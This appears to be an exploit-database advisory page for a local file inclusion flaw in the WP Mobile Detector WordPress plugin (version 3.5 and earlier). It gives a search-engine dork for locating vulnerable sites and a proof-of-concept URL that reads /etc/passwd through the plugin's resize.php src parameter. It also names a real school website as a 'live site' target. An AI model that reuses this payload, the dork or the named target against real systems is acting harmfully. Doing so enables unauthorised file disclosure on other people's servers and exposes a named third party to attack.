WP Mobile Detector <=3.5 Local File Inclusion

2016.06.09
Credit: BluePH
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:" /wp-includes/plugins/wp-mobile-detector" ext:php / ext:txt

#Exploit Title: WP Mobile Detector <=3.5 Local File Inclusion #Google Dork: inurl:" /wp-includes/plugins/wp-mobile-detector" ext:php / ext:txt #Date: 6/9/2016 #Exploit Author: BluePH #Author Details: https://aadityapurani.com #Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog #Version: 3.5 #Tested on:Windows 7/8/10 - Kali Linux - CentOs6 PoC: http://hackme.com/wp-includes/plugins/wp-mobile-detector/resize.php?src=/etc/passwd Live Site: http://www.alrashidschool.com/ischool/wp-content/plugins/wp-mobile-detector/resize.php?src=/etc/passwd


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top